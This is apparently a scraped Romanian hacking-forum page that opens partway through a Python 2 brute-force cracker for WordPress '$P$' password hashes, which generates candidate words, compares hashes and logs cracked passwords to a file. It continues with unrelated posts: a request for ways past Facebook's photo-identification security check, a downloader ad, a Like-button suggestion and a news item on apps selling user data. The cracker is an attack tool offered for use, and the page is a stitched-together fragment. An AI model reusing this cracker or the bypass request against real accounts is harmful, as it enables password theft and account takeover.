from the wordpress hash if len(salt) != 8 : return output plainTextHash = md5.new(str(salt)+str(plainText)).digest() # generate the first hash from salt and word to try for i in range (count): plainTextHash = md5.new(str(plainTextHash)+str(plainText)).digest() # regenerate de hash output = wordpressHash[0:12] # get the first part of the wordpress hash (type,count,salt) output = output + encode64(plainTextHash,16) # create the new hash return output # class that generate the words class wordGenerator (): def __init__(self, word, charSet): self.setCurretWord(word) # word to start self.setCharSet(charSet) # characther set used to generate the words # set current word def setCurretWord (self, word): self.currentWord = word # set the character set that will be used def setCharSet (self, charSet): self.charSet = charSet # generate the next word set that word as currentWord and retutn the word def nextWord (self): self.setCurretWord( self._incWord(self.currentWord) ) return self.currentWord # generate the next word def _incWord(self, word): word = str(word) # convert to string if word == '': # if word is empty return self.charSet[0] # return first char from the char set wordLastChar = word[len(word)-1] # get the last char wordLeftSide = word[0:len(word)-1] # get word without the last char lastCharPos = self.charSet.find(wordLastChar) # get position of last char in the char set if (lastCharPos+1) < len(self.charSet): # if position of last char is not at the end of the char set wordLastChar = self.charSet[lastCharPos+1] # get next char from the char set else: # it is the last char wordLastChar = self.charSet[0] # reset last chat to have first character from the char set wordLeftSide = self._incWord(wordLeftSide) # send left site to be increased return wordLeftSide + wordLastChar # return the next word # check if is right type of hashs for wpHash in wpHashList: if wpHash[0:3] != '$P$': print "Wrong password type or password type is DES not impemented yet!" exit() # create a new wordGenerator newWord = wordGenerator ('',charSet); # word generator wordsFound = 0 exitLoop = False def found(hashItem, word): global wordsFound global exitLoop d = open(dumpFile,'a') # open file for append d.write(hashItem + ' = ' + word +"\n") # write the result d.close() # close file wordsFound = wordsFound + 1 # increase the number of hashs cracked print hashItem + ' = ' + word # display the word if wordsFound == len(wpHashList): # if the number of hash cracked is equal with number of hashs in the list exitLoop = True # rise flag to stop the loop and exit def setProgress(word) : d = open(progFile,'w') # open file for append d.write("Position :"+ word +"\n") # write the current word d.close() # close file count = 0 while exitLoop == False: word = newWord.nextWord() count = count + 1 #print word for wpHash in wpHashList: newHash = crypt_private(word,wpHash) if wpHash == newHash : found(newHash,word) if count == 1000 : count = 0 setProgress(word) H4ve fun :D:D

nu stiu daca tine de categoria AJUTOR, dar pica mai bine aici intrebarea: exista vreo posibilitate de a trece de facebook roadblock? ma refer strict la sectorul de "identify friends in photos". daca stii a raspunde, te rog. daca nu, nu-si au rostul alte intrebari. multumesc.

cine vrea sa de pm

Sa deschis un super si unic downloader..puteti downloada seriale de pe vplay.ro ,muzica si video de pe youtube,trilulilu plus multe alte site-uri utile. Un proiect unic,fara timp de asteptare pentru download,fara reclame..sper sa va fie de folos..mai multe cititi aici: BestDownloadeR.NeT - Unicul downloader multiplu si-a deschis ,,portile,, | CosminKenT.NeT

Deoarece facebook a ajuns sa fie peste tot, m-am gandit ca ar fi o idee buna sa se implementeze un plugin la posturi cu buton de "Like" si crearea unei pagini de Facebook a site-ului. Acestea ar fi niste metode eficiente de populare a RST. Ce spuneti?

Nu mai mira pe nimeni, nu? Dupa ce in ultima perioada de timp au fost scoase la iveala numeroase bug-uri de securitate, deficiente in setarile de confidentialitate, inca o stire legata de vanzarea datelor unor useri de catre o aplicatie de top de pe Facebook a aparut. Facebook zice ca n-are nimic, nu-s mai mult de o duzina de aplicatii autorizate de ei si considerate a fi de top, care fac asta in mod curent. Facebook App Developers Sold User Data…Shock! An Update on Facebook UIDs - Facebook Developers